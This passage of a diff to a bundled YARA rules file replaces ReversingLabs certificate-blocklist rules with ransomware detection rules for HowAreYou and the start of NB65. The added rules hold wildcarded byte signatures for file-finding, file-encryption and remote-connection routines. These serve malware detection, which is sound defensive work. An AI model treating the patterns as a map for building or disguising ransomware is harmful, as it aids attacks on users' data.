+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15
+        }
+		$remote_connection_1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ??
+            ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$remote_connection_2 = {
+            BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
+            8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Helpful Technologies, Inc" and ( pe.signatures [ i ] . serial == "00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures [ i ] . serial == "83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" ) and 1407715199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HowAreYou ransomware."
 		author = "ReversingLabs"
-		id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b"
+		date = "2021-06-14"
+		modified = "2021-06-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2710-L2728"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152"
+		logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HowAreYou"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ??
+            ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ??
+            8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24
+            ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ??
+            ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24
+            C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ??
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B
+            4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05
+            ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1
+        }
+		$remote_connection_p2 = {
+            EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44
+            24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54
+            24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B
+            44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
+            ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C
+            24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8
+            ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+		$find_files_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54
+            24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ??
+            ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89
+            4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49
+            ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ??
+            ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B
+            4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ??
+            ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ??
+            ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
+            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11
+        }
+		$find_files_p2 = {
+            81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ??
+            ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ??
+            8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ??
+            ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89
+            F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ??
+            E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ??
+            ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
+            ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48
+            ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24
+            8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ??
+            89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B
+        }
+		$find_files_p3 = {
+            8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
+            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ??
+            ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B
+            5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24
+            ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88
+            4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ??
+            89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B
+            18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D
+        }
+		$find_files_p4 = {
+            6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89
+            29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ??
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ??
+            ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89
+            0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89
+            2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B
+            44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B
+            44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0
+            0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D
+        }
+		$find_files_p5 = {
+            0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C
+            24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ??
+            ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ??
+            ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89
+            48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08
+            E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ??
+            ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24
+            ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ??
+            ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8
+        }
+		$encrypt_files_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48
+            ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24
+            ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ??
+            89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89
+            44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
+            85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ??
+            ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ??
+            ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8
+        }
+		$encrypt_files_p2 = {
+            85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54
+            24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C
+            24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
+            8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B
+            4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ??
+            8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ??
+            89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ??
+            8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C
+            24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B
+            54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24
+        }
+		$encrypt_files_p3 = {
+            89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ??
+            ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24
+            ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
+            89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 04 24 8B 4C 24 ??
+            89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89
+            0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44
+            24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0
+            89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54
+            24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ??
+            ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90
+            E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CWI SOFTWARE LTDA" and ( pe.signatures [ i ] . serial == "00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures [ i ] . serial == "f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" ) and 1382313599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
